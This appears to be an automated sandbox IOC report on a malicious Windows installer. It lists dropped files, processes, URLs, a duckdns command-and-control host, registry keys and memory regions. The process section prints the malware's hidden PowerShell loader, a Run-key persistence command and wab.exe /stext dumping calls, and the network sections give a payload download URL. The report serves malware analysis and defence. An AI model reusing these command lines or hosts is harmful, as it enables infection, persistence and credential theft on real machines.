IOC Report
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe

loading gif

Files

File Path
Type
Category
Malicious
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\mqerms.dat
data
dropped
malicious
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Recepternes.pen
ASCII text, with very long lines (59011), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aleldatf.a30.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkbyftgc.hqk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv9082.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\spcglopa
Unicode text, UTF-16, little-endian text, with no line terminators
modified
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\Slumretppe.hor
data
dropped
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\bouillonterningens.skk
data
dropped
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\nondeferential.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Grouchy.Opl
data
dropped
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Holomorph196.mil
BS image, Version -29696, Quantization -30208, (Decompresses to 153 words)
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
"C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Escrow=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Recepternes.pen';$Unreverberating=$Escrow.SubString(58974,3);.$Unreverberating($Escrow)"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Paaskelrdag% -windowstyle minimized $Sisies=(Get-ItemProperty -Path 'HKCU:\Jomfruburenes192\').Minnesingers;%Paaskelrdag% ($Sisies)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\spcglopa"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\feujmrlwnrdrjm"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Paaskelrdag% -windowstyle minimized $Sisies=(Get-ItemProperty -Path 'HKCU:\Jomfruburenes192\').Minnesingers;%Paaskelrdag% ($Sisies)"
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://geoplugin.net/json.gpj
unknown
http://geoplugin.net/json.gpp
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://ricohltd.top/-T
unknown
http://geoplugin.net/json.gps
unknown
http://www.imvu.comppData
unknown
http://www.nirsoft.net
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://geoplugin.net/json.gp9
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://ricohltd.top/
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gpB
unknown
https://ricohltd.top/PIoDroeALMbPB243.bineT
unknown
http://crl.micro
unknown
http://geoplugin.net/
unknown
http://geoplugin.net/json.gpL
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://ricohltd.top/PIoDroeALMbPB243.binPm
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://geoplugin.net/json.gpX
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ricohltd.top/PIoDroeALMbPB243.binobm
unknown
https://ricohltd.top/PIoDroeALMbPB243.bin
172.67.191.112
http://www.ebuddy.com
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
learfo55ozj01.duckdns.org
193.222.96.21
malicious
geoplugin.net
178.237.33.50
ricohltd.top
172.67.191.112

IPs

IP
Domain
Country
Malicious
193.222.96.21
learfo55ozj01.duckdns.org
Germany
malicious
172.67.191.112
ricohltd.top
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shield79\Uninstall\mechanalize\Frederikke66
corticosteroid
HKEY_CURRENT_USER\SOFTWARE\valgresultatet\hellige
tilbagefrslen
HKEY_CURRENT_USER\Jomfruburenes192
Minnesingers
HKEY_CURRENT_USER\Environment
Paaskelrdag
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
exepath
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
licence
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Startup key

Memdumps

Base Address
Regiontype
Protect
Malicious
8C77000
direct allocation
page execute and read and write
malicious
2EC4000
heap
page read and write
2EC5000
heap
page read and write
2A90000
heap
page read and write
6FD0000
heap
page execute and read and write
2EC4000
heap
page read and write
4BD0000
heap
page read and write
27D9000
heap
page read and write
4BF9000
heap
page read and write
2FFD000
stack
page read and write
4BC9000
heap
page read and write
2F34000
heap
page read and write
3410000
heap
page read and write
4BC0000
heap
page read and write
2F30000
heap
page read and write
224C9000
heap
page read and write
8240000
direct allocation
page execute and read and write
5430000
trusted library allocation
page read and write
4BD5000
heap
page read and write
4BC1000
heap
page read and write
22332000
heap
page read and write
21F6D000
stack
page read and write
480000
heap
page read and write
81DE000
stack
page read and write
2F34000
heap
page read and write
6170000
heap
page read and write
30FE000
heap
page read and write
2EC4000
heap
page read and write
4BC0000
heap
page read and write
6E7B000
heap
page read and write
2EC4000
heap
page read and write
58B6000
trusted library allocation
page read and write
6178000
heap
page read and write
68A0000
direct allocation
page read and write
41C0000
trusted library allocation
page execute and read and write
50B1000
heap
page read and write
6FB0000
trusted library allocation
page execute and read and write
2EBE000
stack
page read and write
4C02000
heap
page read and write
328E000
stack
page read and write
50B1000
heap
page read and write
4BDB000
heap
page read and write
6470000
direct allocation
page read and write
4C11000
heap
page read and write
2390000
heap
page read and write
45C000
system
page execute and read and write
4C14000
heap
page read and write
4BC0000
heap
page read and write
501E000
stack
page read and write
40C9000
trusted library allocation
page read and write
7F30000
trusted library allocation
page read and write
6480000
direct allocation
page read and write
6EEE000
heap
page read and write
4BFF000
heap
page read and write
6F0000
heap
page read and write
2A60000
trusted library section
page read and write
5430000
trusted library allocation
page read and write
83F7000
trusted library allocation
page read and write
5719000
trusted library allocation
page read and write
32F0000
heap
page read and write
2BFB000
stack
page read and write
473000
system
page execute and read and write
4BCE000
heap
page read and write
4BE9000
heap
page read and write
6430000
direct allocation
page read and write
3230000
heap
page read and write
2E80000
heap
page read and write
4BC9000
heap
page read and write
2EC4000
heap
page read and write
801000
heap
page read and write
6206000
heap
page read and write
4BD5000
heap
page read and write
674E000
stack
page read and write
2FC0000
heap
page read and write
6E4F000
heap
page read and write
2EC4000
heap
page read and write
2BBC000
stack
page read and write
50B1000
heap
page read and write
4BC9000
heap
page read and write
40B3000
trusted library allocation
page execute and read and write
32A0000
heap
page read and write
6200000
heap
page read and write
50B1000
heap
page read and write
6E89000
heap
page read and write
61F9000
heap
page read and write
34D0000
heap
page read and write
9AF000
stack
page read and write
8220000
trusted library allocation
page read and write
3380000
heap
page read and write
6500000
direct allocation
page read and write
7C70000
heap
page read and write
A077000
direct allocation
page execute and read and write
287E000
heap
page read and write
4C57000
heap
page read and write
64F0000
direct allocation
page read and write
270E000
stack
page read and write
21B20000
direct allocation
page read and write
7DB2000
heap
page read and write
4CAA000
trusted library allocation
page read and write
2F34000
heap
page read and write
7F800000
trusted library allocation
page execute and read and write
2BBC000
stack
page read and write
2EC5000
heap
page read and write
223AC000
heap
page read and write
7B77000
stack
page read and write
505E000
stack
page read and write
4BD6000
heap
page read and write
321E000
stack
page read and write
224D1000
heap
page read and write
50B1000
heap
page read and write
2A70000
trusted library section
page read and write
4BCC000
heap
page read and write
4BD0000
heap
page read and write
6990000
heap
page read and write
64D0000
direct allocation
page read and write
70F0000
trusted library allocation
page read and write
408000
unkown
page readonly
2F34000
heap
page read and write
4BC1000
heap
page read and write
4BD5000
heap
page read and write
4BD5000
heap
page read and write
4BC0000
heap
page read and write
40BD000
trusted library allocation
page execute and read and write
6245000
heap
page read and write
4BCB000
heap
page read and write
2F34000
heap
page read and write
4BEC000
heap
page read and write
29CB000
heap
page read and write
2860000
heap
page read and write
30E0000
heap
page read and write
222BA000
heap
page read and write
22840000
unclassified section
page execute and read and write
2CFF000
stack
page read and write
4BD7000
heap
page read and write
2F34000
heap
page read and write
7160000
trusted library allocation
page read and write
2F34000
heap
page read and write
32CF000
stack
page read and write
50B1000
heap
page read and write
32F7000
heap
page read and write
58A3000
trusted library allocation
page read and write
4BEE000
heap
page read and write
23F6000
heap
page read and write
4C39000
heap
page read and write
7120000
trusted library allocation
page read and write
73E000
stack
page read and write
21EAE000
stack
page read and write
64A0000
direct allocation
page read and write
401000
unkown
page execute read
8000000
trusted library allocation
page read and write
4BE9000
heap
page read and write
50B1000
heap
page read and write
22440000
heap
page read and write
6FC0000
trusted library allocation
page read and write
60D0000
heap
page read and write
2340000
heap
page read and write
64B0000
direct allocation
page read and write
4C1B000
heap
page read and write
400000
unkown
page readonly
4BC9000
heap
page read and write
5777000
trusted library allocation
page read and write
50B1000
heap
page read and write
354F000
stack
page read and write
6207000
heap
page read and write
6207000
heap
page read and write
41F0000
heap
page read and write
61FB000
heap
page read and write
21DAC000
stack
page read and write
50B1000
heap
page read and write
2384000
heap
page read and write
5711000
trusted library allocation
page read and write
2330000
heap
page read and write
2EC4000
heap
page read and write
6840000
direct allocation
page read and write
2EC4000
heap
page read and write
4A88000
heap
page read and write
22916000
unclassified section
page execute and read and write
64C0000
direct allocation
page read and write
6EE0F000
unkown
page readonly
4700000
heap
page read and write
6E1C000
heap
page read and write
AAF000
stack
page read and write
50B1000
heap
page read and write
2EC5000
heap
page read and write
400000
system
page execute and read and write
8250000
trusted library allocation
page read and write
4BD0000
heap
page read and write
7D70000
heap
page read and write
4BCE000
heap
page read and write
2EC4000
heap
page read and write
3C70000
remote allocation
page execute and read and write
4BFF000
heap
page read and write
32FB000
heap
page read and write
3110000
heap
page read and write
4BE1000
heap
page read and write
7CEA000
heap
page read and write
AA77000
direct allocation
page execute and read and write
4BCD000
heap
page read and write
4BFA000
heap
page read and write
4BC9000
heap
page read and write
22DC000
stack
page read and write
64E0000
direct allocation
page read and write
6F30000
trusted library allocation
page read and write
6204000
heap
page read and write
224E9000
heap
page read and write
4C1B000
heap
page read and write
7150000
trusted library allocation
page read and write
22930000
heap
page read and write
4BCE000
heap
page read and write
33FE000
stack
page read and write
4C2B000
heap
page read and write
4BD0000
heap
page read and write
340F000
stack
page read and write
50B1000
heap
page read and write
4BF9000
heap
page read and write
2291C000
unclassified section
page execute and read and write
50B1000
heap
page read and write
22091000
direct allocation
page execute and read and write
22131000
heap
page read and write
6F20000
trusted library allocation
page read and write
4C57000
heap
page read and write
19A000
stack
page read and write
2EC4000
heap
page read and write
2F80000
heap
page read and write
32F9000
heap
page read and write
4BE1000
heap
page read and write
4BE1000
heap
page read and write
220A6000
direct allocation
page execute and read and write
2BFE000
stack
page read and write
40A000
unkown
page read and write
4BD5000
heap
page read and write
619D000
heap
page read and write
2EC4000
heap
page read and write
2EC5000
heap
page read and write
4BFB000
heap
page read and write
2EC0000
heap
page read and write
5739000
trusted library allocation
page read and write
4BD1000
heap
page read and write
4BE3000
heap
page read and write
819C000
stack
page read and write
50B1000
heap
page read and write
4BE3000
heap
page read and write
30F2000
heap
page read and write
50B1000
heap
page read and write
2380000
heap
page read and write
9677000
direct allocation
page execute and read and write
400000
system
page execute and read and write
310F000
heap
page read and write
6490000
direct allocation
page read and write
2F34000
heap
page read and write
36F0000
heap
page read and write
2BCC000
stack
page read and write
41B000
system
page execute and read and write
2BBF000
unkown
page read and write
304E000
stack
page read and write
224D2000
heap
page read and write
4BD5000
heap
page read and write
71EB000
stack
page read and write
6F17000
trusted library allocation
page read and write
4BE5000
heap
page read and write
4C1A000
heap
page read and write
701E000
stack
page read and write
4C39000
heap
page read and write
7100000
trusted library allocation
page read and write
2EC4000
heap
page read and write
7BB0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page execute and read and write
6EE0D000
unkown
page read and write
4BE1000
heap
page read and write
2EF0000
heap
page read and write
30BE000
unkown
page read and write
5430000
trusted library allocation
page read and write
2EC5000
heap
page read and write
2EC5000
heap
page read and write
4190000
heap
page readonly
228B3000
unclassified section
page execute and read and write
4BD0000
heap
page read and write
32FA000
heap
page read and write
7C5E000
stack
page read and write
287F000
stack
page read and write
7F10000
trusted library allocation
page read and write
41A8000
trusted library allocation
page read and write
6830000
direct allocation
page read and write
224B9000
heap
page read and write
279D000
stack
page read and write
5E0000
heap
page read and write
4BD0000
heap
page read and write
4BD0000
heap
page read and write
22240000
heap
page read and write
21DEE000
stack
page read and write
7CB0000
trusted library allocation
page read and write
456000
system
page execute and read and write
4BDE000
heap
page read and write
6520000
heap
page read and write
60E0000
heap
page read and write
4BEE000
heap
page read and write
228E000
stack
page read and write
4C09000
heap
page read and write
29C0000
heap
page read and write
21EEC000
stack
page read and write
7B8000
heap
page read and write
6546000
heap
page read and write
27A0000
heap
page read and write
50B1000
heap
page read and write
4BD5000
heap
page read and write
50B1000
heap
page read and write
61EB000
heap
page read and write
22441000
heap
page read and write
7140000
trusted library allocation
page read and write
23E0000
heap
page read and write
5430000
trusted library allocation
page read and write
6255000
heap
page read and write
6450000
direct allocation
page read and write
4BEC000
heap
page read and write
50B4000
heap
page read and write
7CD4000
heap
page read and write
327C000
heap
page read and write
53EE000
stack
page read and write
6440000
direct allocation
page read and write
6EDF0000
unkown
page readonly
4BE9000
heap
page read and write
8010000
heap
page read and write
33B0000
heap
page read and write
34F0000
heap
page read and write
41F7000
heap
page read and write
297F000
stack
page read and write
414E000
stack
page read and write
2EC4000
heap
page read and write
21B10000
direct allocation
page read and write
4EC0000
heap
page read and write
4C57000
heap
page read and write
21F2E000
stack
page read and write
41AF000
remote allocation
page execute and read and write
6E3F000
heap
page read and write
80DC000
stack
page read and write
6F40000
trusted library allocation
page read and write
60F5000
heap
page read and write
46A0000
heap
page execute and read and write
98000
stack
page read and write
2207B000
unclassified section
page execute and read and write
2EC5000
heap
page read and write
7180000
trusted library allocation
page read and write
7CC0000
heap
page read and write
52AF000
stack
page read and write
2F34000
heap
page read and write
21BAF000
stack
page read and write
8B60000
direct allocation
page execute and read and write
408000
unkown
page readonly
30E8000
heap
page read and write
224C8000
heap
page read and write
50B1000
heap
page read and write
4BD0000
heap
page read and write
224E9000
heap
page read and write
6460000
direct allocation
page read and write
32F9000
heap
page read and write
274E000
stack
page read and write
4BD8000
heap
page read and write
5DE000
stack
page read and write
4BC1000
heap
page read and write
45BE000
stack
page read and write
21AF0000
direct allocation
page read and write
4BDE000
heap
page read and write
4BE1000
heap
page read and write
6245000
heap
page read and write
21FAE000
stack
page read and write
4BE1000
heap
page read and write
32CE000
unkown
page read and write
4BAF000
remote allocation
page execute and read and write
2289D000
unclassified section
page execute and read and write
2F34000
heap
page read and write
2EC4000
heap
page read and write
2F34000
heap
page read and write
7E7000
heap
page read and write
6410000
direct allocation
page read and write
6850000
direct allocation
page read and write
6200000
heap
page read and write
4100000
trusted library allocation
page read and write
58BC000
trusted library allocation
page read and write
27A8000
heap
page read and write
35CF000
stack
page read and write
2A98000
heap
page read and write
40B4000
trusted library allocation
page read and write
2A40000
heap
page read and write
2D00000
heap
page read and write
21E2F000
stack
page read and write
2E3D000
stack
page read and write
3418000
heap
page read and write
45FE000
stack
page read and write
7F20000
trusted library allocation
page read and write
4BD1000
heap
page read and write
2890000
heap
page read and write
4FE4000
heap
page read and write
2EC4000
heap
page read and write
4709000
heap
page read and write
60F0000
heap
page read and write
221A9000
heap
page read and write
6207000
heap
page read and write
454000
unkown
page readonly
21B00000
direct allocation
page read and write
42C000
unkown
page read and write
4BC9000
heap
page read and write
2EC4000
heap
page read and write
4BC1000
heap
page read and write
6255000
heap
page read and write
4BCC000
heap
page read and write
4BD5000
heap
page read and write
22441000
heap
page read and write
4BF4000
heap
page read and write
2E34000
stack
page read and write
435000
unkown
page read and write
6160000
direct allocation
page read and write
5430000
trusted library allocation
page read and write
6800000
heap
page execute and read and write
4BDE000
heap
page read and write
3270000
heap
page read and write
40E5000
trusted library allocation
page execute and read and write
2898000
heap
page read and write
50BF000
stack
page read and write
400000
unkown
page readonly
6255000
heap
page read and write
6CFE000
stack
page read and write
21CCE000
stack
page read and write
50B1000
heap
page read and write
2E80000
heap
page readonly
3D87000
remote allocation
page execute and read and write
2F34000
heap
page read and write
4BC8000
heap
page read and write
2E60000
heap
page read and write
21C90000
remote allocation
page read and write
6400000
direct allocation
page read and write
2E32000
stack
page read and write
228C0000
unclassified section
page execute and read and write
709E000
stack
page read and write
6EF000
stack
page read and write
4770000
trusted library allocation
page read and write
23F0000
heap
page read and write
68C0000
direct allocation
page read and write
4BE1000
heap
page read and write
6880000
direct allocation
page read and write
2251B000
heap
page read and write
2A80000
trusted library allocation
page read and write
50B1000
heap
page read and write
30DC000
heap
page read and write
330E000
stack
page read and write
25FD000
stack
page read and write
30F6000
heap
page read and write
40E2000
trusted library allocation
page read and write
61D7000
heap
page read and write
6890000
direct allocation
page read and write
224D2000
heap
page read and write
2EFD000
heap
page read and write
6EE06000
unkown
page readonly
358E000
stack
page read and write
6F50000
trusted library allocation
page read and write
7C1E000
stack
page read and write
2F40000
heap
page readonly
23DE000
stack
page read and write
40E0000
trusted library allocation
page read and write
4BE1000
heap
page read and write
4BE5000
heap
page read and write
2254A000
heap
page read and write
21E6B000
stack
page read and write
6FA0000
trusted library allocation
page read and write
4BDD000
heap
page read and write
4BE9000
heap
page read and write
310F000
heap
page read and write
418F000
stack
page read and write
6E96000
heap
page read and write
2E70000
heap
page read and write
2872000
heap
page read and write
467E000
stack
page read and write
6540000
heap
page read and write
24FD000
stack
page read and write
2F34000
heap
page read and write
2E60000
heap
page read and write
21FEC000
stack
page read and write
7110000
trusted library allocation
page read and write
4CAC000
trusted library allocation
page read and write
2E16000
stack
page read and write
4BD5000
heap
page read and write
40DA000
trusted library allocation
page execute and read and write
40C0000
trusted library allocation
page read and write
4BE9000
heap
page read and write
7F50000
trusted library allocation
page execute and read and write
4BC1000
heap
page read and write
22241000
heap
page read and write
4BE5000
heap
page read and write
7F00000
trusted library allocation
page read and write
4C1A000
heap
page read and write
4711000
trusted library allocation
page read and write
4C57000
heap
page read and write
4BCC000
heap
page read and write
4BCE000
heap
page read and write
4BC0000
heap
page read and write
4BE1000
heap
page read and write
4BC1000
heap
page read and write
4BF4000
heap
page read and write
4BE1000
heap
page read and write
70DD000
stack
page read and write
2F90000
heap
page read and write
21C90000
remote allocation
page read and write
22130000
heap
page read and write
4BE3000
heap
page read and write
2E2F000
stack
page read and write
50B0000
heap
page read and write
4BF4000
heap
page read and write
43F000
unkown
page read and write
4BE1000
heap
page read and write
4BE1000
heap
page read and write
22332000
heap
page read and write
454000
unkown
page readonly
4BDE000
heap
page read and write
4C00000
heap
page read and write
4BCC000
heap
page read and write
821D000
stack
page read and write
27CC000
heap
page read and write
224E9000
heap
page read and write
4EC1000
heap
page read and write
2F90000
heap
page read and write
4866000
trusted library allocation
page read and write
400000
system
page execute and read and write
323D000
stack
page read and write
68B0000
direct allocation
page read and write
3273000
heap
page read and write
2F34000
heap
page read and write
2FA8000
heap
page read and write
30E0000
heap
page read and write
2870000
heap
page read and write
2FA0000
heap
page read and write
29AE000
unkown
page read and write
22060000
unclassified section
page execute and read and write
2EC4000
heap
page read and write
7B0000
heap
page read and write
2430000
heap
page read and write
2D20000
heap
page read and write
811C000
stack
page read and write
2EC4000
heap
page read and write
542F000
stack
page read and write
6820000
direct allocation
page read and write
4BD5000
heap
page read and write
678E000
stack
page read and write
7BA0000
trusted library allocation
page read and write
6EDF1000
unkown
page execute read
459000
system
page execute and read and write
53AF000
stack
page read and write
50B1000
heap
page read and write
4BE9000
heap
page read and write
3230000
trusted library allocation
page read and write
815E000
stack
page read and write
221AA000
heap
page read and write
451000
unkown
page read and write
2EC4000
heap
page read and write
59E000
stack
page read and write
6F10000
trusted library allocation
page read and write
6E36000
heap
page read and write
7EB000
heap
page read and write
7B80000
heap
page read and write
41D0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page execute and read and write
6D12000
heap
page read and write
30DE000
stack
page read and write
785000
heap
page read and write
30D0000
heap
page read and write
2EC4000
heap
page read and write
4B9F000
stack
page read and write
68D0000
direct allocation
page read and write
278E000
stack
page read and write
4BD5000
heap
page read and write
6810000
direct allocation
page read and write
780000
heap
page read and write
50A0000
heap
page read and write
5430000
trusted library allocation
page read and write
221A9000
heap
page read and write
50B1000
heap
page read and write
21D10000
heap
page read and write
431000
unkown
page read and write
2EC4000
heap
page read and write
40D000
unkown
page read and write
2F3D000
stack
page read and write
6CBE000
stack
page read and write
4CB2000
trusted library allocation
page read and write
40D0000
trusted library allocation
page read and write
40B0000
trusted library allocation
page read and write
2EC0000
heap
page read and write
2EC4000
heap
page read and write
7170000
trusted library allocation
page read and write
2319000
stack
page read and write
4BFF000
heap
page read and write
6E00000
heap
page read and write
2202E000
stack
page read and write
6860000
direct allocation
page read and write
2BFA000
stack
page read and write
30E8000
heap
page read and write
7130000
trusted library allocation
page read and write
32FA000
heap
page read and write
22090000
direct allocation
page read and write
21D6C000
stack
page read and write
2EC5000
heap
page read and write
4BD0000
heap
page read and write
5430000
trusted library allocation
page read and write
6805000
heap
page execute and read and write
21C90000
remote allocation
page read and write
2EC4000
heap
page read and write
6E58000
heap
page read and write
55AF000
remote allocation
page execute and read and write
2EC4000
heap
page read and write
4BD0000
heap
page read and write
4BE1000
heap
page read and write
68E0000
direct allocation
page read and write
4BA0000
heap
page read and write
7190000
trusted library allocation
page read and write
224B9000
heap
page read and write
4BE1000
heap
page read and write
8230000
trusted library allocation
page execute and read and write
46EE000
stack
page read and write
457C000
stack
page read and write
2FA0000
heap
page read and write
50B1000
heap
page read and write
7EF5000
trusted library allocation
page read and write
21870000
heap
page read and write
4BC1000
heap
page read and write
2E1B000
stack
page read and write
2E70000
heap
page readonly
21B6E000
stack
page read and write
7C60000
heap
page read and write
32DF000
stack
page read and write
2EC4000
heap
page read and write
34C0000
heap
page read and write
50B1000
heap
page read and write
45D000
system
page execute and read and write
22221000
heap
page read and write
22899000
unclassified section
page execute and read and write
2F34000
heap
page read and write
22940000
heap
page read and write
21D0F000
stack
page read and write
4BE1000
heap
page read and write
5FAF000
remote allocation
page execute and read and write
27DE000
stack
page read and write
6F90000
trusted library allocation
page read and write
4EC1000
heap
page read and write
50B1000
heap
page read and write
4BD0000
heap
page read and write
2F34000
heap
page read and write
705F000
stack
page read and write
6420000
direct allocation
page read and write
40A000
unkown
page write copy
463E000
stack
page read and write
4BE9000
heap
page read and write
71A0000
trusted library allocation
page read and write
50B1000
heap
page read and write
2E90000
heap
page read and write
6150000
heap
page readonly
401000
unkown
page execute read
4BFF000
heap
page read and write
2F34000
heap
page read and write
4BE3000
heap
page read and write
22CE000
stack
page read and write
288E000
heap
page read and write
2EC4000
heap
page read and write
31DF000
stack
page read and write
50B1000
heap
page read and write
6870000
direct allocation
page read and write
There are 652 hidden memdumps, click here to show them.